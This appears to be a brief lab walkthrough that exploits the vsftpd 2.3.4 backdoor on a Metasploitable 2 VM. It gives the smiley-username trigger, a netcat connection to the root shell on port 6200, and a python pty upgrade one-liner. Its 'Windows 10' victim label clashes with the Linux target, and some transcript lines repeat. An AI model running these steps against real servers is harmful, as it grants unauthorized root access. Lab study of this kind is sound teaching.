VSFTPD v2.3.4 Backdoor Command Execution
July 02, 2016 —
metalkey
Attacker: Kali LinuxVictim: Windows 10
VSFTPD v2.3.4 contains a backdoor that is triggered by entering anystring:) as the username (no password required). After the backdoor is triggered, the target machine opens a shell on port 6200.
This example demonstrates it’s use on Metasploitable 2 (192.168.1.142).
Triggering the Backdoor
root@kali:~$ ftp 192.168.1.142
Connected to 192.168.1.142.
220 (vsFTPd 2.3.4)
Name (192.168.1.142:root):123456:)
331 Please specify the password.
Password: [Enter]
[CTRL+C]
421 Service not available, remote server has closed connection
Connected to 192.168.1.142.
220 (vsFTPd 2.3.4)
Name (192.168.1.142:root):
331 Please specify the password.
Password: [Enter]
[CTRL+C]
421 Service not available, remote server has closed connection
Connecting to the Shell
root@kali:~$ nc -vn 192.168.1.142 6200
(UNKNOWN) [192.168.1.142] 6200 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/#
(UNKNOWN) [192.168.1.142] 6200 (?) open
root@metasploitable:/#
Tags: backdoors